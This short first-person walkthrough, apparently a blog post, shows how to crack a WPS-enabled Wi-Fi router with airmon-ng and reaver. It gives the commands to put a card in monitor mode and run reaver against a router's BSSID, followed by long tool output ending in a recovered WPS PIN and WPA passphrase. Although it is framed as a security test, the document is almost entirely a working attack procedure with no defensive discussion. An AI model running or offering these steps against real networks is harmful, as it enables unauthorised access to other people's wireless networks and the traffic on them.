This is the way I tested the security of a Wireless network with WPS enabled.
Put your wireless card on Monitor mode:
$ sudo airmon-ng start wlan0
Run ‘reaver’ program to crack the WPS:
$ sudo reaver -i mon0 -b 00:11:22:33:44:55 -vv
Replace 00:11:22:33:44:55 with the BSSID of wireless router (with WPS enabled)
You should see these messages:
Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Waiting for beacon from 00:11:22:33:44:55 [+] Switching mon0 to channel 1 [+] Associated with 00:11:22:33:44:55 (ESSID: WPS-ROUTER) [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 00005678 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 01235678 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 11115670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK
Many hours later (more than 10h in my case) :
[+] Pin cracked in 38417 seconds [+] WPS PIN: '77805034' [+] WPA PSK: '6C0D5A37E7B0A30C' [+] AP SSID: 'WPS-ROUTER'
